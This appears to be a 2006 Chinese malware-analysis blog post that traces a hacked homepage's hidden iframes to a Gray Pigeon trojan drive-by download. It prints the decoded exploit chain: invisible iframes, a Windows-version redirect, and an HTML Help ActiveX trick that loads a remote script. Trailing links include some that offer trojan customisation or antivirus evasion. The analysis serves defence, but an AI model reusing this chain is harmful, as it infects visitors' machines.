endurer 原创
2006-04-12 第3版 补充:瑞星的反应
2006-04-08 第2版 分析young.gif,确认young.css为灰鸽子
2006-04-07 第1版
网站首页被插入恶意代码:
<iframe src='hxxp://www.***hyap98.com/123/wawa.htm' width='0' height='0' frameborder='0'></iframe><iframe src='hxxp://djloveqq.***go3.icpcn.com/cert/joke.htm' width='0' height='0' frameborder='0'></iframe>
hxxp://www.***hyap98.com/123/wawa.htm的部分内容经过escape()加密,unescape()后为:
<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words="<iframe src="hxxp://www.***hyap98.com/123/music.htm" width='0' height='0' frameborder='0'></iframe>
<iframe src="hxxp://www.***hyap98.com/rx/joke.htm" width='0' height='0' frameborder='0'></iframe>"
function SetNewWords()
{
var NewWords;
NewWords=unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>
hxxp://www.***hyap98.com/123/music.htm的部分内容经过escape()加密,unescape()后为:
<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words="<embed type="audio/x-pn-realaudio-plugin"
src="music.smi"
controls="controlpanel,statusbar" height=95
width=150 autostart=true>"
function SetNewWords()
{
var NewWords;
NewWords=unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>
hxxp://www.***hyap98.com/rx/joke.htm的内容为(已去掉多余的起始空格):
<center><font color=red>对不起,您访问的页面不存在!</font><center> <script language=javascript>ie='windows';ver=navigator.appVersion;if(!(ver.indexOf('NT 5.0')==-1))ie='winnt';if(!(ver.indexOf('Windows 98')==-1)){ie='w98';}location.href=ie+'.htm';</script>
此网页检查Windows版本,并打开相应的网页windows.htm、winnt.htm或w98.htm。
这与又一个自动下载病毒的政府网站中遇到的相似。
hxxp://www.***hyap98.com/rx/windows.htm的部分内容经过escape()加密,unescape()并去掉多余的起始空格后为:
<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words="<SCRIPT language=VScript src="young.gif"></SCRIPT><SCRIPT language=VScript src="young.css"></SCRIPT><HTML><BODY><div style="display:none"><OBJECT id="news526" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;/windows/help/apps.chm');</OBJECT><OBJECT id="news215" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;javascript:eval("document.write(/"<SCRIPT language=JScript src=///"hxxp://www.***hyap98.com/rx/young.gif///"/"+String.fromCharCode(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'></OBJECT></div><SCRIPT>news526.Click();f1=1+1;f1=f1+2;setTimeout("news215.Click();",0);fu1=2;fu1=3+4;</SCRIPT></BODY></HTML>"
function SetNewWords()
{
var NewWords;
NewWords=unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>
hxxp://www.***hyap98.com/rx/winnt.htm的部分内容经过escape()加密,unescape()并去掉多余的起始空格后为:
<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words="<SCRIPT language=VScript src="young.gif"></SCRIPT><SCRIPT language=VScript src="young.css"></SCRIPT><HTML><BODY><div style="display:none"><OBJECT id="news571" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;/winnt/help/apps.chm');</OBJECT><OBJECT id="news577" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;javascript:eval("document.write(/"<SCRIPT language=JScript src=///"hxxp://www.***hyap98.com/rx/young.gif///"/"+String.fromCharCode(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'></OBJECT></div><SCRIPT>news571.Click();f1=1+1;f1=f1+2;setTimeout("news577.Click();",0);fu1=2;fu1=3+4;</SCRIPT></BODY></HTML>"
function SetNewWords()
{
var NewWords;
NewWords=unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>
hxxp://www.***hyap98.com/rx/w98.htm的大小为0。
hxxp://www.***hyap98.com/rx/young.css其实是个加过壳的PE可执行文件。
hxxp://www.***hyap98.com/rx/young.gif其实是个利用系统漏洞的网页文件,访问注册表获取IE临时文件夹路径,并利用WScript.Shell复制文件young.css,创建文件c:/wins.bat,c:/boot.hta,C:/wins.exe。
windows.htm 瑞星报为:Trojan.DL.JS.Agent.g
winnt.htm 瑞星报为:Trojan.DL.JS.Agent.h
分享到:
相关推荐
主要有两步:1、清除灰鸽子的服务;2删除灰鸽子程序文件。注意:为防止误操作,清除前一定要做好备份
灰鸽子修改启动画面 打造属于自己的灰鸽子启动画面 呵呵 多看看多学习多进步 加油 祝大家早日拥有自己的工具
专门查杀灰鸽子客户端。 如果你的机子中了灰鸽子,这个可以帮你一扫而净。
ssm-2.0.8.573有效阻止灰鸽子.exe
有遇到有灰鸽子到你的密码,撬开你的锁吗?那为什么不用这个软件呢,可以针对的将你的病毒扫除门外
超强灰鸽子vip2005检测器
“灰鸽子”专用检测清除工具
木马检测\灰鸽子终结者2007.exe
帮你揭碑本人远程监控的控绕
104种清除木马的方法 请大家自己下载 104种清除木马的方法 请大家自己下载
灰鸽子木马清除器
灰鸽子相信大家都不陌生,我这里总结了目前各种版本的灰鸽子专杀,截止2010,主流的,都可以,别的不敢保证了,希望能帮到你!不要当肉鸡!
网络-计算机-安全相关
电子商务支付(“灰鸽子”相关文档)共6张.pptx
2007年的互联网状况可以说是不容乐观,自从轰动一时的“熊猫烧香”、“金猪”病毒、到臭名远洋的“灰鸽子”木马、还有最近的“ANI”漏洞真是让人很头疼!而且病毒不仅仅是造成互联网高危状态的主要因素,网络上同时...
木马手工清除方法
2007年的互联网状况可以说是不容乐观,自从轰动一时的“熊猫烧香”、“金猪”病毒、到臭名远洋的“灰鸽子”木马、还有最近的“ANI”漏洞真是让人很头疼!而且病毒不仅仅是造成互联网高危状态的主要因素,网络上同时...
打造干不掉的鸽子(鸽子无需免杀).ra打造干不掉的鸽子(鸽子无需免杀).rarr
由于近期灰鸽子木马的横行,故新版附带灰鸽子专杀工具完全查杀所有灰鸽子木马.更加强了对种类变种木马查杀力度.让木马无处遁形.采用剑马新图标,更美观.软件更加易用功能更加贴心,让你在上网冲浪的同时免去了对木马...